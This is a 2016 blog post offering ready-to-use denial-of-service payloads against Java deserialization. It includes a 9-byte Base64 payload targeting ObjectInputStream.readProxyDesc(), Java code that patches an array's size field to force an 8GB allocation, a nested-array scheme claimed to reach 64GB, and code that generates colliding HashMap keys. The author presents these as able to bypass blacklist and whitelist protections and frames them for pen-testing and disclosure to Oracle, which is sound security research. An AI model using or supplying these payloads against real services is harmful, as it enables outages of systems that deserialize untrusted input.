Friday, April 1, 2016

Java Deserialization DoS - payloads

Handy payloads for testing Java Deserialization vulnerability

GitHub project:

Update: A new attack vector against ObjectInputStream.readProxyDesc() using just 9 bytes: rO0ABX1////3
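The 9-byte vector is easy to inspect: Base64-decoded, it is the standard stream header followed by TC_PROXYCLASSDESC (0x7D) and a 4-byte interface count equal to Integer.MAX_VALUE - 8, which readProxyDesc() uses to pre-allocate a String[] before reading anything else. A quick check (the class name below is mine):

```java
import java.util.Base64;

public class ProxyPayload {
    public static void main(String[] args) {
        byte[] p = Base64.getDecoder().decode("rO0ABX1////3");
        // p = AC ED 00 05 (stream header), 0x7D (TC_PROXYCLASSDESC),
        // then the 4-byte interface count that gets pre-allocated.
        int count = ((p[5] & 0xFF) << 24) | ((p[6] & 0xFF) << 16)
                  | ((p[7] & 0xFF) << 8) | (p[8] & 0xFF);
        System.out.println((p[4] & 0xFF) == 0x7D);          // true
        System.out.println(count == Integer.MAX_VALUE - 8); // true
    }
}
```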


  • Generic heap overflow
  • Heap overflow using nested Object[] arrays 
  • Heap overflow using nested ArrayList
  • Heap overflow using nested HashMap
  • HashMap and Hashtable collision attacks

These can be used to bypass blacklist protections, or whitelists that allow Object[] arrays, ArrayList or HashMap.

Payloads to consume 8GB of heap:

Generic (9 bytes): 


Nested Object[] (44 bytes): 


Nested ArrayList (67 bytes):


Nested HashMap (110 bytes):



114 bytes to consume 64GB of heap (nested Object[]):


Short description of Heap overflow attacks

To minimize the payload size, I play with the "size" field of these classes, overwriting the serialized data so that the "size" is near Integer.MAX_VALUE even though the payload contains only a few entries.

During deserialization these classes pre-allocate big arrays (based on "size") to be filled with values before the actual values are read. It is therefore not necessary to send all the values: OutOfMemoryError is thrown after just a few allocations, because the objects can be nested ... an Object[] can contain another Object[].
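As a minimal sketch of the size-field trick (class and method names are mine): serialize an empty Object[], then overwrite its element count, which for an empty array is the last 4 bytes of the stream under the standard serialization format. The sketch only builds the bytes, since deserializing them would trigger the ~8 GB pre-allocation:

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;

public class SizePatch {
    public static byte[] maxSizedArrayPayload() {
        try {
            // Serialize an empty Object[]. In the stream, the 4-byte
            // element count is the last thing written for an empty array,
            // i.e. the final 4 bytes.
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
                oos.writeObject(new Object[0]);
            }
            byte[] payload = bos.toByteArray();
            int size = Integer.MAX_VALUE - 8;   // max array size the JDK allows
            int off = payload.length - 4;       // offset of the element count
            payload[off]     = (byte) (size >>> 24);
            payload[off + 1] = (byte) (size >>> 16);
            payload[off + 2] = (byte) (size >>> 8);
            payload[off + 3] = (byte) size;
            return payload;
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        // Feeding this to ObjectInputStream.readObject() would pre-allocate
        // an Object[2147483639] (~8 GB) before reading any element, so the
        // sketch deliberately never deserializes it.
        System.out.println(maxSizedArrayPayload().length + " bytes");
    }
}
```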

Let's look at the Object[] payload. It was modified to have the maximum possible array size: ArrayList.MAX_ARRAY_SIZE = Integer.MAX_VALUE - 8. This means an array of about 2 billion pointers (4 bytes each) => 2^31 * 4B = 8GB

With 8 such Object[] arrays nested one inside another, the JVM allocates an 8GB array for the root object, then reads the first item ... a nested Object[] which is again a max-sized array. So it allocates another 8GB, continues to deserialize the 2nd-level array with another 8GB, etc. etc., and sooner or later fails with OutOfMemoryError.
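The arithmetic behind the 64GB figure above, as a quick sketch:

```java
public class NestedCost {
    public static void main(String[] args) {
        long perArray = (Integer.MAX_VALUE - 8L) * 4L; // one max-sized Object[]: ~8 GB of 4-byte refs
        int depth = 8;                                 // nesting levels in the payload
        long total = perArray * depth;                 // allocated before any real element is read
        System.out.println(Math.round(total / (double) (1L << 30)) + " GB"); // 64 GB
    }
}
```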

Short description of HashMap and Hashtable collision attacks

HashMap in Java 1.7, when created with initialCapacity == loadFactor, creates one and only one bucket to store all items.
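With all items in one bucket, every insert traverses the full chain, so n entries cost O(n^2) key comparisons. The same chain-walking can be forced on a normally sized table with keys whose hash codes collide; the classic construction concatenates equal-hash String blocks (a sketch, class name is mine):

```java
import java.util.ArrayList;
import java.util.List;

public class HashCollisions {
    // "Aa" and "BB" have the same String.hashCode(); concatenating k such
    // blocks yields 2^k distinct keys with identical hash codes, so they
    // all land in the same bucket.
    public static List<String> collidingKeys(int k) {
        List<String> keys = new ArrayList<>();
        keys.add("");
        for (int i = 0; i < k; i++) {
            List<String> next = new ArrayList<>();
            for (String s : keys) {
                next.add(s + "Aa");
                next.add(s + "BB");
            }
            keys = next;
        }
        return keys;
    }

    public static void main(String[] args) {
        List<String> keys = collidingKeys(4); // 16 keys, one shared hash
        System.out.println(keys.get(0).hashCode() == keys.get(15).hashCode()); // true
    }
}
```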

Hashtable suffers a similar condition during deserialization and allows a negative loadFactor => again using just one bucket to store all items.
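For contrast, the public constructor does validate loadFactor and rejects anything <= 0, which is what makes the deserialization path accepting a negative value notable. A quick check (class and method names are mine):

```java
import java.util.Hashtable;

public class LoadFactorCheck {
    // Hashtable's constructor throws IllegalArgumentException for
    // loadFactor <= 0 or NaN; the readObject path (per the report above)
    // accepted a negative loadFactor the constructor would never allow.
    public static boolean constructorRejects(float loadFactor) {
        try {
            new Hashtable<String, String>(1, loadFactor);
            return false;
        } catch (IllegalArgumentException expected) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println(constructorRejects(-1.0f)); // true
    }
}
```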

Other info

Please use these only for pen-testing / evaluation of your own products.

Reported to Oracle in 2015 with a "won't fix" response. The Hashtable negative-loadFactor bug is treated as a functional bug and should be fixed in one of the future releases.